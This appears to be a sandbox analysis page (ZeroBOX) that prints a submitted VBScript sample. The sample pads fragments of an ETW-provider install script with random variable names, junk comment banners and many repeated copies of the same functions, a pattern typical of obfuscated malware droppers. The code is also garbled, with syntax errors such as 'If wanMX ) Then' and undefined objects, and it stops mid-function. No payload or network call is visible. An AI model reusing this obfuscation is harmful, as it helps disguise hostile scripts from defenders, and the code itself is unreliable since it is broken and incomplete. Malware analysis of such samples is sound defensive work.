Static | ZeroBOX
No static analysis available.
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
On Error Resume Next::::::: zGUbcjUeRMKFdIqmVWzrNNBzStXdUyoJuBokulsUyuUbRUKhig :::::
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function fkrgb
' If this is msi mode, uninstall failures are not fatal
If False = "bftxs" Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("rhlrw") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
jZqrl = RegExFolderPart.Replace ( jZqrl, GbTHa + "\" )
' If the resource DLLs referenced in the provider manifest are main OS DLLs
' then we don't include them in the OPK, instead we include a resource-only
' dll with the etw.dll suffix. For these DLLs we need to add the suffix here.
If 0 = InStr( messageFileName, "etw.dll" ) Then
messageFileName = RegExExtensionPart.Replace ( messageFileName, "etw.dll" )
End If
If 0 = InStr( jZqrl, "etw.dll" ) Then
End If
wanMX = RegExFolderPart.Replace ( VNYpK, njrls.ExpandEnvironmentStrings("%TEMP%") + "\" ) + ""
If wanMX ) Then
FixManifest = ""
Exit Function
End If
FixManifest = wanMX
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
'''''''''''''''''''''' rgnky ''''''''''''''''''''''
' Print usage baSTo
' Install Providers
' Uninstall Providers
Function kycEE
' If this is msi mode, uninstall failures are not fatal
If False = oPVGo Then
On Error Resume Next
End If
GbTHa = Session.TargetPath("ETWProviders")
EVhDM( GetRef("ipiCN") )
On Error Goto 0
End Function
' Enumerates over the provider manifests
Function EVhDM( YWQyi )
Dim sCOEt, GXnlH, File
' Remove possible trailing backslash
If Right(GbTHa, 1) = "\" Then
GbTHa = Left(GbTHa, Len(GbTHa) - 1)
End If
' Uninstall an ETW Provider
' Create a fixed-up copy of a provider manifest
Dim lpzfh, dtywx, JoGki, ASaBf
Dim wanMX, messageFileName, jZqrl
Set lpzfh = CreateObject("msxml2.DOMDocument.3.0")
lpzfh.async = false
lpzfh.resolveExternals = false
lpzfh.validateOnParse = false
If Not lpzfh.load( VNYpK ) Then
FixManifest = ""
Exit Function
End If
Set dtywx = lpzfh.SelectNodes("//*/provider")
If dtywx Is Nothing Then
FixManifest = ""
Exit Function
End If
For Each JoGki In dtywx
Set ASaBf = JoGki.attributes
messageFileName = ASaBf.getNamedItem("messageFileName").nodeValue
messageFileName = RegExFolderPart.Replace ( messageFileName, GbTHa + "\" )
